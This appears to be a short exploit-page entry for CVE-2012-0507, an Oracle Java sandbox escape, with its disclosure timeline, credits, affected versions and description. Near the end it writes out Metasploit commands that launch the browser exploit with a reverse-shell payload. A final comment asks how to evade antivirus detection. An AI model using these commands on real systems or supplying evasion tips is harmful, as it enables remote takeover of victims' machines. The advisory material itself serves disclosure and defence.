Timeline :
Vulnerability found by Jeroen Frijters
Vulnerability reported to the vendor by Jeroen Frijters the 2011-08-01
Coordinated public release of the vulnerability the 2012-02-14
Details of the vulnerability published by Jeroen Frijters the 2012-02-23
Metasploit PoC provided the 2012-03-29
PoC provided by :
Jeroen Frijters
sinn3r
juan vazquez
egypt
Reference(s) :
CVE-2012-0507
OSVDB-80724
Oracle Java SE Critical Patch Update Advisory – February 2012
Affected version(s) :
Oracle Java SE 7 Update 2 and before
Oracle Java SE 6 Update 30 and before
Oracle Java SE 5.0 Update 33 and before
Tested on Windows XP Pro SP3 with :
Oracle Java SE 6 Update 16
Internet Explorer 8
Description :
This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.
Commands :
use exploit/multi/browser/java_atomicreferencearray SET SRVHOST 192.168.178.100 SET PAYLOAD generic/shell_reverse_tcp set LHOST 192.168.178.100 exploit
Any tips on evading antivirus with this? It’s caught by MSE.